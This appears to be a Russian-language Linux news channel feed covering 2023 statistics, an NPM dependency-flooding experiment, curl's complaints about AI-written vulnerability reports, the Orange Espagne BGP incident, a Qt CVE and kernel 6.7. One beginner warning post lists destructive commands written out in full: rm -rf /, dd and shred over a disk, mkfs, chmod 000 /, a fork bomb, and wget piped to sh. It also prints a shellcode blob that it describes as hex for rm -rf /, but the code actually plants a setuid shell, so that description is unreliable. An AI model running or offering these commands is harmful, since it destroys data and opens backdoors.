Статистика по Linux за 2023

▪️ Доля Linux на декстопе превысила 3%. — StatCounter

Мир: 3.21%, Европа чуть подкачала, 2.64%, хотя, казалось бы? Лидирует Индия, 15.6% и в целом азиатский регион, 5.34%.

▪️ Доля Linux среди пользователей Steam в моменте (август) превышала 2%, и это было больше, чем пользователей macOS. — Valve

▪️ Исходный код RHEL теперь доступен только на платной основе. — cnews

▪️ LTS версии ядра Linux теперь будут поддерживаться в течение 2 лет, а не 6, как было ранее. Самым старым поддерживаемым ядром становится 5.10.

▪️ Доля женщин среди разработчиков ядра: 9,9%, если считать по аккаунтам на Гитхабе. — The Linux Foundation. Это примерно 330 человек, вместе они сделали около 4000 коммитов, что составляет 6,8% от общего числа коммитов.

▪️ Релизы популярных дистрибутивов — по данным разных источников: Linux Mint 21.3 beta, Kali Linux 2023.4, RHEL 9.3 и Fedora 39, Ubuntu и Kubuntu, обе 23.10, Debian 12, LMDE 6, openSUSE Leap 15.5, MX Linux 23, а также апдейт номер 3 Oracle Linux версии 9.

▪️ В 2023 году вышел текущий актуальный минорный релиз — версия 6.6. — Линус Торвальдс

Кстати, в этой версии из ядра удалены упоминания АНБ США, которые, оказывается там были. SElinux изначально был привнесён в ядро именно программистами данной правительственной организации.

▪️ Дистрибутив Astra сертифицирован на соответствие требованиям ФСТЭК России к средствам виртуализации по первому классу защиты. — cnews. Компания также сообщала, что выручка за девять месяцев 2023 г. достигла 4,6 млрд руб.

▪️ В моменте над ядром Linux работало 2088 разработчиков. Это касается версии 6.2, увидевшей свет 19 февраля 2023 года, и это рекордно-большое число разработчиков, работавших над одним релизом.

▪️ Топ-10 популярных дистрибутивов на 31 декабря 2023 года (Со срезом "1 месяц") — distrowatch.com:

1. MX Linux
2. Mint
3. EndeavourOS
4. Manjaro
5. Zorin
6. Debian
7. Ubuntu
8. Nobara
9. Fedora
10. Pop!_OS

📌 Источник: https://habr.com/ru/articles/784222/

Linux / Линукс 🎄

Linux / Линукс 🎄

Эксперимент с созданием NPM-пакета, зависимого от всех пакетов в репозитории

Данный эксперимент провёл один из разработчиков JavaScript-пакетов. Так, пакет "everything" связан прямыми зависимостями с пятью пакетами "@everything-registry/chunk-N", которые в свою очередь привязываются зависимостями к более 3000 пакетов "sub-chunk-N", в каждом из которых осуществляется привязка к 800 существующих пакетов в репозитории.

Размещение "everything" в NPM привело к двум интересным эффектам.
▪️ Во-первых, пакет "everything" стал своеобразным инструментом для совершения DoS-атак, так как попытка его установки приводит к загрузке миллионов размещённых в NPM пакетов и исчерпанию имеющегося дискового пространства или остановке выполнения сборочных процессов. По статистике NPM пакет был загружен около 250 раз, но никто не мешает добавить его в зависимости к другому пакету после взлома учётной записи разработчика для совершения диверсии.

▪️ Во-вторых, публикация пакета "everything" фактически заблокировала возможность удаления любых пакетов в NPM, которые оказались в списке его зависимостей. Пакет из NPM может быть удалён автором только если он ещё не используется в зависимостях других пакетов, но после публикации "everything" зависимостями оказались охвачены все пакеты в репозитории.
✅ Примечательно, что удаление самого пакета "everything" также оказалось заблокированным, так как 9 лет назад в репозитории был размещён тестовый пакет "everything-else", в котором была указана строка "everything" в списке зависимостей.

Linux / Линукс 🎄

10 команд Linux, которые убьют ваш сервер (для новичков)

Необратимые
▪️ rm –rf / - Удаляет всё, до чего только может добраться. Существует несколько вариаций для маскировки этой команды:

mkdir test

cd test

touch ./-r

touch ./-f

su

rm * /

char esp[] attribute ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

(16-ричное представление команды rm –rf /, его система тоже поймёт)

▪️ sudo dd if=/dev/zero of=/dev/sda bs=8m - Заполняет начальные 40Мбайт (8m) жесткого диска, которые содержат важные данные структуры нулями, что делает невозможным их восстановление и приводит к невозможности загрузки ОС.

▪️ shred /dev/sda - Удалит все данные на жёстком диске.
▪️ mkfs.ext3 /dev/sda - Форматирование жесткого диска.
▪️ chmod -Rv 000 / - Отнимает все разрешения на все файлы и все папки в системе. После ввода этой команды систему нельзя будет даже перезагрузить. А если перезагрузить её вручную, то она всё равно уже не сможет запуститься нормально, так как запрашиваемые при загрузке компоненты будут недоступны.
▪️ chown -R nobody:nobody / - Меняет владельца всех файлов и папок системы на “никого”.

Опасные, но обратимые команды
▪️ :(){ :|:& };: - Логическая бомба, забивающая память системы, что в итоге приводит к её зависанию. Ни к чему фатальному это не приведет, но перезагрузиться всё же придётся.
▪️ команда > file.conf - Команда, которая может перезаписать важный конфигурационный файл.
▪️ wget https://вредоносный_сайт -O- | sh - Скачивание и последующие исполнение какого-либо скрипта c сайта в Интернете.
▪️ chmod -R 777 / - Даёт разрешение всем пользователям системы читать, перезаписывать и запускать всё что угодно.

Linux / Линукс 🎄

Linux / Линукс 🎄

Дэниел Cтенберг, автор утилиты для получения и отправки данных по сети curl, выступил с критикой использования AI-инструментов при создании отчётов об уязвимостях. Подобные отчёты включают детальные сведения, написаны нормальным языком и выглядят качественными, но без вдумчивого анализа на деле могут лишь вводить в заблуждение, подменяя реальные проблемы качественно выглядящим мусорным содержимым.

Проект Curl выплачивает вознаграждения за выявление новых уязвимостей и уже получил 415 отчётов о потенциальных проблемах, из которых лишь 64 были подтверждены как уязвимости, 77 описывали не связанные с безопасностью ошибки, а 274 (66 %) не содержали каких-либо полезных сведений и только отняли у разработчиков время.

✅ Разработчики вынуждены впустую тратить много времени на разбор бесполезных отчётов и перепроверять указанные там сведения по несколько раз, так как внешнее качество оформления вызывает дополнительное доверие к информации и возникает ощущение, что разработчик что-то недопонял. С другой стороны, формирование подобного отчёта требует минимальных усилий от заявителя, который не утруждает себя проверкой наличия реальной проблемы, а просто слепо копирует данные полученные от AI-помощников, надеясь на везение в борьбе за получение вознаграждения.

Linux / Линукс 🎄

Компрометация учётной записи привела к сбою BGP-маршрутизации Orange Espagne

Компрометация учётной записи администратора привела к почти четырёхчасовому сбою в работе второго по величине испанского оператора связи Orange Espagne, обслуживающего 11 млн абонентов. Для доступа к интерфейсу регистратора RIPE NCC в Orange Espagne применялся предсказуемый пароль "ripeadmin" и не была включена двухфакторная аутентификация.

Пароль к RIPE был перехвачен в ходе поражения системы одного из сотрудников вредоносным ПО и с сентября находился в продаваемых на чёрном рынке базах скомпрометированных паролей. Примечательно, что кроме учётной записи Orange Espagne в указанных базах присутствуют и тысячи других аккаунтов для подключения к access. ripe. net, которые потенциально можно использовать для совершения подобных атак.

Linux / Линукс 🎄

Linux / Линукс 🎄

В библиотеке Qt выявлена уязвимость (CVE-2023-51714) в реализации протокола HTTP/2. Она позволяет добиться записи своих данных за пределы выделенного буфера.

Уязвимость вызвана целочисленным переполнением в коде разбора упакованных заголовков (HPack) и проявляется при получении более 4 ГБ суммарных данных HTTP-заголовков или 2 ГБ для одного заголовка. Проблема устранена в обновлениях Qt 5.15.17, 6.2.11, 6.5.4 и 6.6.2.

Linux / Линукс 🎄

GNOME создает новое расширение системного мониторинга для GNOME Shell

Теперь пользователям GNOME Shell доступна новая опция, разработанная и поддерживаемая самой GNOME. Расширение добавляет ряд значков на верхней панели, рядом с которыми указаны соответствующие нагрузки / скорости:
– CPU load (global; not per-core)
– Memory usage
– Swap usage
– Network upload speed
– Network download speed

Некоторые значки меняют цвет при высокой нагрузке.

Linux / Линукс 🎄

Linux / Линукс 🎄

Релиз ядра Linux 6.7

После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.7. Среди наиболее заметных изменений:
– интеграция ФС Bcachefs,
– прекращение поддержки архитектуры Itanium,
– возможность работы Nouvea с прошивками GSP-R,
– поддержка TLS-шифрования в NVMe-TCP,
– возможность использования исключений в BPF,
– поддержка futex в io_uring,
– оптимизация производительности планировщика fq (Fair Queuing),
– поддержка расширения TCP-AO (TCP Authentication Option),
– возможность ограничения сетевых соединений в механизме защиты Landlock,
– добавлено управление доступом к user namespace и io_uring через AppArmor.

Linux / Линукс 🎄

Для OpenBSD реализована возможность использования рабочего стола KDE Plasma

Объявлено о доступности пользовательского окружения KDE Plasma 5.27 для установки в OpenBSD-current, формировании готовых для установки пакетов kde-plasma и kde-plasma-extra, и намерении обеспечить поддержку KDE Plasma в весеннем выпуске OpenBSD 7.5. После прекращения поддержки KDE4 в OpenBSD так и не была перенесена возможность использования новой ветки рабочего стола KDE Plasma 5.

Для установки KDE Plasma и KDE Gear теперь достаточно выполнить команды:
pkg_add kde
pkg_add kde-plasma
pkg_add kde-plasma-extra

Linux / Линукс 🎄

GitHub заблокировал игровой движок OpenXRay

Репозиторий открытого проекта OpenXRay, воспроизводящего игровой движок для первых частей игры S.T.A.L.K.E.R., оказался заблокирован на GitHub. Проект основан после утечки исходных кодов оригинального движка S.T.A.L.K.E.R. и ставит перед собой цель исправления всех оригинальных недочётов и введения новых возможностей, таких как поддержка 64-разрядных платформ, Linux и OpenGL.

Причиной блокировки стало требование с информацией о нарушении действующего в США Закона об авторском праве в цифровую эпоху, которое было отправлено в GitHub от лица компании GSC Game World, разработавшей серию игр S.T.A.L.K.E.R.

Однако в официальном Twitter-е компании GSC появилось сообщение, что блокировка проведена не по её инициативе и отправленное требование является ложным. Компания GSC одобряет проект OpenXRay и разрешает его использование для модов. Представители компании обещают разобраться в ситуации.

Linux / Линукс 🥸

Linux / Линукс 🥸

Разработчики Arch Linux задействовали проект dbus-broker в качестве применяемой по умолчанию реализации шины D-Bus. Утверждается, что использование dbus-broker вместо классического фонового процесса dbus-daemon позволит повысить надёжность, увеличить производительность и улучшить интеграцию с systemd.

Возможность использования старого фонового процесса dbus-daemon в качестве опции сохранена.

Linux / Линукс 🥸

Linux / Линукс 🥸